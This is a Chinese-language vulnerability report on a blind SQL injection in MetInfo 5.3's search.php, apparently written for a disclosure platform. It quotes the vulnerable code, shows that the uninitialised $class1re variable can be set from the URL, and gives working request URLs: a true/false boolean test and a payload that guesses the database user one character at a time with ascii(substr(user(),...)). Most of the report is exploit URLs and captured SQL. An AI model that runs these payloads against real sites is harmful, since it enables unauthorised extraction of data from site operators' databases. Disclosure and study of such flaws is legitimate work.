MetInfo5.3 最新版本SQL注射(可获取部分数据)

摘要

MetInfo5.3 最新版本SQL注射 search.php: $module=intval($module); if($class1)$module=0; if(intval($module)){ $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' "; }else{ $class1_info=$class_list[$class1]; if(!$class1_info)okinfo('../',$pagelang[noid]); $class1sql=" class1='$class1' "; $class2sql=" class2='$class2' "; $class3sql=" class3='$class3' "; if($class1&&!$class2&&!$class3){ foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){ if($val['releclass']==$class1){ $class1re.=" or class1='$val[id]' "; } } if($class1re){ $class1sql='('.$class1sql.$class1re.')'; } } if($class_list[$class2]['releclass']){ $class1sql=" class1='$class2' "; $class2sql=" class2='$class3' "; $class3sql=""; } $serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql "; 由于$class1re 没有进行初始化，所以全局只需要越过

简要描述：

MetInfo5.3 最新版本SQL注射

详细说明：

search.php:

$module=intval($module);      if($class1)$module=0;      if(intval($module)){        $serch_sql.=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' ";   }else{   $class1_info=$class_list[$class1];   if(!$class1_info)okinfo('../',$pagelang[noid]);   $class1sql=" class1='$class1' ";   $class2sql=" class2='$class2' ";   $class3sql=" class3='$class3' ";      if($class1&&!$class2&&!$class3){    foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){     if($val['releclass']==$class1){      $class1re.=" or class1='$val[id]' ";     }    }    if($class1re){     $class1sql='('.$class1sql.$class1re.')';    }   }   if($class_list[$class2]['releclass']){    $class1sql=" class1='$class2' ";    $class2sql=" class2='$class3' ";    $class3sql="";   }   $serch_sql=" where lang='$lang' and (recycle='0' or recycle='-1') and displaytype='1' and $class1sql ";

由于$class1re 没有进行初始化，所以全局只需要越过

foreach($module_list2[$class_list[$class1]['module']] as $key=>$val){     if($val['releclass']==$class1){      $class1re.=" or class1='$val[id]' ";     }    }

这一条逻辑即可：

发送url:

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=1&searchword=1&lang=cn&class1re=xxxxxx

抓取sql语句为：

2015/4/8 14:39 SELECT COUNT(*) FROM met_news where lang='cn' and (recycle='0' or recycle='-1') and displaytype='1' and ( class1='2' xxxxxx) and title like '%1%'

然后进行构造

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=1-- sd

页面是:

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and 1=2-- sd

ayload:

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=$NUM,1,0)-- sd

根据页面变化 补充$NUM

来进行敏感信息猜测

由于我这里是root

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=114,1,0)-- sd

页面里面没有xxxxxx

http://localhost/MetInfo5.3/search/search.php?class1=2&class2=&class3=&searchtype=2&searchword=xxxxxx&lang=cn&class1re=) and if(ascii(substr(user(),1,1))=1141,1,0)-- sd

页面里面有xxxxx